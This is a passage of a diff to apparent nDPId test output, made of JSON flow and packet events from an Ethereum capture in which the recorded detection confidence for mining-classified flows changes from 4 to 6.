00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1578508365777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365777,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLqHAqAG4I+sl2N1jdl9d8bOcqknE0YAQECyPmwAAAQEICiLYmMg1IQWk"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1578508365781,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365781,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHjqoAAEARyLjAqAG40WGPAXZfw1AAs7BF2l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1578508365813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365813,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAG8nVeRDeiwKgBuHZf3WKbomHRWAgB9KAScSDEJQAAAgQFrAQCCAppF+qfItiYqQEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1578508365813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365813,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4n3AqAG4XkQ3ot1idl9YCAH0m6Jh0oAQECxToAAAAQEICiLYmOdpF+qf"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365828,"flow_last_seen":1578508365828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365828,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1578508365828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGW5bAqAG4DfsOx91mdl9PCwRhAAAAALAC\/\/\/02wAAAgQFtAEDAwUBAQgKItiY9AAAAAAEAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365846,"flow_last_seen":1578508365846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365846,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -322,13 +322,13 @@ 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1578508365899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1578508365899,"pkt":"KDc3AG3IEBMx8Tl2CABFAACxNvdAACcRcwrKcBxqwKgBuHZfdl8AnfAw9M4wDHlezlLb\/XVAde5xoPK0MYWPqo8wL1hvUi9RDAnTme70\/IGTzT1fYmed3PImx\/QlqjXSlKRDpOJrSqown1EL4xkYxe9gDpH7mkxI5SW3Td37cSNZr69+s5vwesE7AQLyy4RPFs69gun3gnZfoAhIsWiV\/\/bYUAtK\/XBnLAnnp\/ohE29dCVwVPQWUC9vDhF4WIGE="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1578508365903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365903,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGwUMj5J40wKgBuHZf3Weyx8H3Rbl\/W6AS\/ogN9wAAAgQFrAQCCAqAlezxItiZBAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1578508365903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365903,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtkvAqAG4I+SeNN1ndl9FuX9bssfB+IAQECwq5AAAAQEICiLYmTiAlezx"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1578508365919,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365919,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc44MAAEARsuTAqAG4p1Z6MnZfdl8AiFGIcmRL\/sJ+HmBFF7n+UfEKJLvDdBgdKzSECJqxpMbuAWJCFnSyz1LOPGHXvK4XvgJfd8y9TVVaoZxiY0SgM1nuu1KcsxmveZ1Iboux45kEq0UHna5hbl98Bua+Zy2zz7pAAAHdBMuEfwAAAYJ2X4J2X8mEp1Z6MoJ2X4CEXhYgYQU="} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1578508365925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365925,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMG5s7PtM7YwKgBuHZf3WknDwC1nc8LZ6AScSCqDAAAAgQFrAQCCApcfI6dItiZJwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1578508365926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365926,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2dbAqAG4z7TO2N1pdl+dzwtnJw8AtoAQECw5oAAAAQEICiLYmUxcfI6d"} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1578508365951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1578508365951,"pkt":"KDc3AG3IEBMx8Tl2CABFAACvrTpAADMRthqnVnoywKgBuHZfdl8AmyGXAff4avCCJKd8iLkYnGp5WBGcR5kwKjaGYfuGK7O5Pxha3PZrVargsE3sp+V969kCE0ZShXRyP212X0\/ogX+KLxU0BMrg9yur0MCSn4OC+hF8e78p1SovnEhcJv1j5UvsAALwyYSnVnoygnZfgKByZEv+wn4eYEUXuf5R8Qoku8N0GB0rNIQImrGkxu4BYoReFiBh"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366005,"flow_last_seen":1578508366005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366005,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1578508366005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366005,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGV9jAqAG4M1PtLN1sdl8dp4x2AAAAALAC\/\/+ZwwAAAgQFtAEDAwUBAQgKItiZlwAAAAAEAgAA"} @@ -337,98 +337,98 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1578508366029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+KMAAAAgQFtAEDAwUBAQgKItiZrAAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1578508366047,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366047,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GadwzU+0swKgBuHZf3WzP3gWFHaeMd6AScSA1dQAAAgQFrAQCCAppVMVvItiZlwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1578508366048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366048,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGV+TAqAG4M1PtLN1sdl8dp4x3z94FhoAQECzFBwAAAQEICiLYmb1pVMVv"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1578508366053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366053,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQG6OaKOxE6wKgBuHZf3Wh1cVfy7bR73KAScSDVxwAAAgQFrAQCCArYuYPhItiZCQEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1578508366053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG3O7AqAG4ijsROt1odl\/ttHvcdXFX84AQECxkxwAAAQEICiLYmcLYuYPh"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1578508366058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366058,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG0R1YY13bwKgBuHZf3W1kMpWvgknUHaAScSBLTAAAAgQFrAQCCApXTVsMItiZpAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1578508366058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366058,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwiXAqAG4WGNd291tdl+CSdQdZDKVsIAQECza4gAAAQEICiLYmcZXTVsM"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366073,"flow_last_seen":1578508366073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366073,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 